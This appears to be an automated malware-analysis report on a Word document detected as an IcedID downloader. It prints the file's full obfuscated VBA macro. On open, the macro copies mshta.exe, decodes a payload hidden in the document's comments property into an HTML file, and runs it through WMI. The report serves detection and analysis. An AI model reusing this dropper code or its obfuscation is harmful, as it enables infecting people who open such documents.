MALICIOUS
170
Risk Score
Heuristics 6
-
ClamAV: Doc.Downloader.IcedID-87f88705f807f878-9951567-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.IcedID-87f88705f807f878-9951567-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
CreateObject(aol9k8).create (aEqo9T) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
- http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
- http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 13812 bytes |
SHA-256: 29d974d41ba5fef42740a6aed294c436753351e195057262feca75cac070c374 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "aiEyT1"
Function avXcI(ayI1o)
' Brimstone mass transsexual compress annotated adsl
anr5ej = ayI1o
aGOKqk = Len(anr5ej)
For aEdFx = 0 To aGOKqk - 1
' Turnip
' Latina believe undo
' Christening conclave derelict name
' Dispatch paint jj eyesight
' Ezek. seething
' Measure gonna gis complaints
' But publishers album perform wheels
' Sodium reduce anatomy morgan proud
' Horseshoe arbor
' Quotes dodge
' Non-commissioned
' Neck medium forwarding
' Outdoor architect lady
' Copiously craftsmen
' Sickle tartar unproductive nbc filter
' Wrestle counters realtors clay jeremy mosque
' Flowery giving
' Waxing deferential submitting hwy deformity
' Ontario
' Mx pickle in pasta bah
' Ac min even benny corn
' Journalist solving macintosh
agqXK = agqXK & Mid(anr5ej, (aGOKqk - aEdFx), 1)
Next aEdFx
avXcI = agqXK
End Function
Public Function aqiYf(aqUf2)
aqiYf = Replace(aqUf2, acM2C7, "")
End Function
Sub AutoOpen()
aVGUi
End Sub
Attribute VB_Name = "aObjqF"
Public Const axwFO As String = "sse)cor)P_2)3ni)W:2)vmi)c\t)oor):st)mgm)niw"
Public Const acM2C7 As String = ")"
Public Const aMbkqK As Integer = 2278 - 2265
Function aT4wgK()
End Function
Sub ab4Pf(aJvHOa)
' Corset diary continence
' Drought marge islamic
' Laudable latter
' Ordinance estimate forces discussed roulette
' Shaving cretaceous iceberg crunch
' Delivering plebeian shannon
' Theocracy
' Completing enamoured browse enamel
' Mixed column
' Georgetown downloaded developers
' Goblet
' Lazy presidential fundamentals free latter
' Rancour voyuer
' Scenic discharge buttermilk probably bones premium
' Hindrance ogre
' Louise fixed
' Sucking reservoir remembered hostelry cosmetics
' Diadem
' Welcome fires j nude coup
' Beget instructors imperial
' Polar imprison hotels devel mad
' Rood casey possible tape divorced defend
' Sucks codes exodus
' Ste irreconcilable qualm
' Indiscreet friendship where married
' Gram metres veracity
' Voter answerable lop
' Planes remarks crater
' Ipaq aggressor
' Counsellor abner lode entries
' Former maw deafening enabling favorite whichever
' Clearance thoughtfulness russia
' Velocity spouse ampland snowball
' Gourmet mating
' Outermost mince cox taste
' Nude goes
' Nicest began
' Pearl daily ur unyielding
End Sub
Function auHMZ(aBcUGX)
' Laden sufficiently
' Causal bowler painting
' Sm hexameter reprisal
' Cuisine novelty closest realism bate charitable other
' Fragrance test hewlett allegorical fussy jerusalem
' Candelabra vibration intervals rivulet arguments
' Expulsion suite signet abed shewn dorchester
' Delineate incredulous examining hove
' Vail mania tally
' Qualify tighten treatment
' Impel fee botanical
auHMZ = ActiveDocument.BuiltInDocumentProperties(aBcUGX)
End Function
Public Sub aZKUHg()
If -162 + 226 < 190 Then
Call aGEteI
End If
End Sub
Public Sub aJZq5M()
If -162 + 226 < 190 Then
Call aGIcg
End If
End Sub
Attribute VB_Name = "aSp34M"
Public Function anUHD(auQ3P, aLbtT)
' Successfully hong engineers
' Do hydra square leave-taking
' Pct pistil reciprocal concise pessimist
' Highlander
' Oxford winning relax rich autobiographical ak
' Immaculate winter discussing disheartening victim
' Oven abolitionist along speculate james
' Cyprus frustration
' Von expectations gen montreal psychological ado
' Opening pico robertson thrace bracelet
' Inequalities ge
' Humanity fda flip influenced
' Explained lizard cherubim griffiths
' Nsw available thrush
' Objectionable frog stickers hate
' Jeff mad cs unpopular lay treasure
' Faraday
' Config cite
' Bdsm legion boob
' Aj dandy
' Sonny forthcoming loco employment
' Ntsc colored dizziness
' Relaxation prometheus
' Accounts print valuables
FileNumber = FreeFile
Open auQ3P For Output As #FileNumber
' Bailey britney
' Identity came examined grow
' Board
' Betake crape dreamer computation
' Disapproval scathing
' Seq pac sepulchre
' Insuperable rev migration whirring images frieze exhaust
' Proof irritable holocaust demean
' Biographies fatty move fermentation
' Mongrel revolutionary
' Ruby higgins dorset
Print #FileNumber, aLbtT
' Gauze
' Rivet
' Seas sandra contumely scenic infringe beginning arrive
' Organisation anaheim dickie
' Barricade
' Bean distinguished
' Suffocate geology beef
' Shatter formerly proposition pichunter
' Etymology
' Plug
Close #FileNumber
End Function
Sub aaEsen(aeZ1u, aiUWQ)
' Officers irregularity scouring
' Dt souvenir orchestra deleterious stimuli trash
' Treated thrifty investigate
' Migration bestir animating mallet
' Andrea mosquito heifer nuke
' Stucco wn fits
' Official sitter reality
' Abstruse conch lac
' Waiting buzz self-defense
' Faq dislocation canvas
' Exhibition particle rocket
' Butterfly requirement whelp logic esperanto
' Bracelet abstemious
' Clients hauteur herein prostores committee
' Maryland parliament nl senile barrister
' Helper vancouver self-reliant rwanda
' Birth sen breast pretty
' Apart onlooker exhibition penalties lashing
' Si grafting attack
' Mc correctly
' Midwest manitoba phones bailey fergus
' Reproduce pinnacle pike far-fetched
' Sugar communist disaster
' Miracle nomadic moose paperbacks interstate
' Substance
' Attraction congenital
' Bulwark listen abyssinian
' Deepen
' Rancorous alcohol
' Including
' Handcuffs oddity flexible ash
' Authorization parity patricia
FileCopy aeZ1u, aiUWQ
End Sub
Function agSeJ9(aSjbH)
' Truncheon deliver stranger heretical
' Sicken eocene strikes tardily
' Angelic readily pickle vouchsafe
' Quicken confident buffet
' Vacuum celebrate strut waterproof winnipeg
' Pharmaceuticals sucks verzeichnis
' Pouch levant proceed march
' Catalonia tray
' Ancona zero festivals swum czech
' Topics
' Prices hickory winning
agSeJ9 = aSjbH
End Function
Attribute VB_Name = "akAdZ"
Sub aVGUi()
' Hoar reflect well defensible
' Kinship
' Dont furze marion speaks friend plucky experiencing
' Arrow rats wrongly
' Ends infants own differential
' Weeding hat tenets ostrich
' Robertson lynx
' Released crunch
' Joyce lung furze crackling democracy magazines plumb
' Foam isolation
' Urbane measurement african
aZKUHg
' Metropolitan fader pointed
' Concurrence basketball watershed
' Earnings predicated comes gavin
' Gifts tusk destiny
' Sappho trice
' Infatuation
' Posterior bottle
' Consequences unix
' Leonard
' Appeared mars
' Identifying
aJZq5M
' Pours layers teresa libels dung aerial
' Primate fem tinder groundwater confessor
' Maiden
' Premiere varied allan
' Camp cord
' Protected dollar
' Sure gills wallis
' Cameo
' Sacerdotal
' Detention any drainage charts cinnamon
' Haughtily
' Dissent conservatory falls dalton incidental
' Avi trust transmitted crate
' Linux
' Equanimity humanities vermont jade
' Notices pc desecration partly victorian
' Neck noisome constitutional
' Communication mat encumber verdant handicap
' Uneven bedding loam self-defence
' Phd abolitionist
' Vagina wichita
' Mote inmate intellectual
' Sextant uncivilized jm ninety-nine
' Clips rocky
' Johannes acquirement lisa
' Vol
' Swish
' Ascension embryonic putrid
' Gunther fop copyright satisfactory carried
' Petroleum realized gang
' Blithe lie origins snorted
' Odd arran namely
aol9k8 = aqiYf(avXcI(axwFO))
' Enters playwright
CreateObject(aol9k8).create (aEqo9T)
End Sub
Attribute VB_Name = "a3VCrd"
Function aXLZQm()
aXLZQm = VBA.Split(avXcI("l)m)t)h).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)|)m)o)c).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)|)e)x)e).)a)t)h)s)m)\)2)3)m)e)t)s)y)s)\)s)w)o)d)n)i)w)\):)c)|)o)t)o)m) )o)l)l)e)h)"), "|")
End Function
Function aOSy3(aRlfN)
' Perdition board succor
aEr3f = aXLZQm()
' Therefore accommodating sixty-three
' Feldspar unicameral rna
' Religious
' Spectacular kick
' Wills transmitter bigamy padlock wheres
' Recruit
' Suspected dvd
' Doe formosa methodical hedgehog
' Kindergarten hating given wu compound katrina
' Xbox supervise altitude extradition
' Bowl hose
Select Case aRlfN
' Formed insistence
' Face fido vex clinic
' Sync com accost motherhood
' Cram underfoot
' Reviewed speakers interrogatory murderess
' Collective antecedent mew
' Shatter discipline
' States branches bones bar
' Symantec revenues
' Dead lyre
' Scenarios format flow
Case 0:
aOSy3 = aEr3f(1)
' Ste. repugnant drawbridge
' Loathsome handled wrongfully
' Practices achievements
' Must penitentiary
' Sidon assignment furlough typing powell
' Russian prefix aluminum roe whipping mouse
' Volunteers giver wrong unsaid
' Spoke sharon lode think
' Par drizzle safari tho
' Yachts tt
Case 1:
aOSy3 = aEr3f(2)
' Recreation probably
' Loin disparaging mouthful
' Tyrol pliant
' Recognizable ladle oe
' Bodyguard advertise consecutive
' Prince
' Guillotine karen spell
' Spontaneity
' Cuckold porno blackboard
' Viennese reach
' Highway triste partiality
' Obloquy psi sandwich exams
' Sheffield authorized ep
' Sustainability atom
' Cock mixing sesame enormous
' Steering pig constitution embarkation
' Secretion interstate detecting res
' Perspectives damask ion
' Shingle background wn
' Estranged soliloquy advisory spread
' Fido heirloom enormous
Case 2:
aOSy3 = aEr3f(3)
End Select
End Function
Sub aGIcg()
aXmPEa = aSfgz(aOSy3(2))
anUHD aXmPEa, ad0AL(auHMZ("comments"))
End Sub
Attribute VB_Name = "adeOsb"
Function a8g7d(au1CYx)
a8g7d = aqiYf(au1CYx)
End Function
Function aNoIBL(aabRj)
' Waterman whisk maize
aNoIBL = (aqiYf(aabRj))
End Function
Function aSfgz(aSF7Y)
' Ban
' Change valuables aggravated actuated outdoors humanities
' Occur thong lard chamois
' Baking hearsay inter
' Nz discovers originally veterinary
' Prep fox unrestrained likely retail runner date
' Insurgents punjab pranks gmt
' Ladylike extravagantly juno mileage
' Strut gens porter purchasing
' Animates flustered precipitation
' Granted fraternity gb
aSfgz = (aqiYf(aSF7Y))
End Function
Function aEqo9T()
a5sgn = aNoIBL(aOSy3(1))
aDnzOI = aSfgz(aOSy3(2))
aEqo9T = a5sgn & " " & aDnzOI
End Function
Sub aGEteI()
aSodTi = a8g7d(aOSy3(0))
a5sgn = aNoIBL(aOSy3(1))
aaEsen aSodTi, a5sgn
End Sub
Function aTfbRh(a7RT5)
aTfbRh = a7RT5 + 26806 / 1031
End Function
Function axPB6(aSPzf3)
If aSPzf3 = 0 Then
axPB6 = 31138 - 31137
' Straight kashmir pry punjab importation disclaimed
' Hinge councils chapel bronze
' Parameter cosmos expense
' Survey loquacity attest
' Tyler dickie
' Creeper dickie
' Uncut prank
' Blemish
' Stagnation money worldcat mermaid proficiency ferry
' Apache
' Parallel causing recipients skills
' Irritable smear
' Hoops doorstep cbs
ElseIf aSPzf3 = 5 Then
axPB6 = 41 + 56
Else
axPB6 = 32 * 32
End If
End Function
Function acerN(a7RT5, axWRQ)
acerN = a7RT5 - axWRQ
End Function
Function aVB3Q2(a7RT5)
aVB3Q2 = Chr(a7RT5)
End Function
Attribute VB_Name = "aMra76"
Function ad0AL(achYR8) As String
Dim aFfabi As Long
Dim aeC7S As Integer
Dim avmKNS As Integer
For aFfabi = 1 To VBA.Len(achYR8) Step 1
avmKNS = 0
' Journalist pussy accompanied tendon
a2sj4 = Mid(achYR8, aFfabi, 1)
aeC7S = Asc(a2sj4)
' Disc loading spasm
' Ip classify transference patriarchal
' Ian ferret notification powers genetics
' Crap wayne approx
' Present amputation pup doug pittsburgh
' Mongolia
' Per brooch grotto
' Jap sensuality mesquite
' Castle i phoenix transcendental f
' Persecute lean wrapping ontario
' Ps. ostler barnaby prediction stipulate
' Ripped carouse criterion
' Xx
' Guts womankind
' Soonest cannibalism formed
' Undignified
' Immature bibliographic push forms
' Variants comp
' Breasts appointed niger deviate atlantic wiki
' Racket toyota polygamy obtaining
' Discursive nitrogen buff
' Secession review
' Sapling lifestyle dates
' Merchandise besotted vpn
' Pick trice pseudonym
' Roses concord crumbled
' Prisoner distribution
' Fumble vocal concede violinist
' Abdicate aircraft travis
' Thoughts decorous swoop tactful
' Vocals firebrand spontaneously
' Movement useful smallest withstood
' Funny
' Acclaimed waft
If (aeC7S > 64 And aeC7S < 91) Or (aeC7S > 96 And aeC7S < 123) Then
avmKNS = aMbkqK
aeC7S = acerN(aeC7S, avmKNS)
If aeC7S < axPB6(5) And aeC7S > 83 Then
aeC7S = aTfbRh(aeC7S)
ElseIf aeC7S < -209 + 274 Then
aeC7S = aTfbRh(aeC7S)
End If
End If
a6YTE = aVB3Q2(aeC7S)
' Vertically thrive interrogate
' Brooch underlying shaw bend
' Archive facile footnote
' Persistence tours denial vitiated effective
' Interventions comparisons preside shaky
' Potato wa qualifications deleterious responsive jewelry
' Sprightly determine anodyne
' Rueful modicum granny
' Delayed magazine required wheres transmitting
' Leads ti em fa richie
' Acrimonious
' Outdo elevation giant
' Alfred whitby
' Mockingly oasis
' Bleed dispersion
' Bounce drivers sender condo babes
' Butler arrange longevity dictation dropsy
' Bakery matches defer
' Lets
' Wellington pennon banned
' Wales lounge caracalla lounge primordial
' Turner lounge scouting
Mid$(achYR8, aFfabi, 1) = agSeJ9(a6YTE)
Next
' Stripes mort
' Restorer bananas profundity
' Belarus inexpensive discordant additions
' Ewe readers
' Beech axiom tradesman
' Plymouth carbolic
' Pessimistic static
' Americanism till answering
' Wrote stitch sagacious packed conditional
' Avon heralds
' Lloyd lab roland spreading
ad0AL = achYR8
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 55808 bytes |
SHA-256: e552dc461ea9b7f9ca1c03ba4781c07334340ae9a4ad2babf2368bab12acea82 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.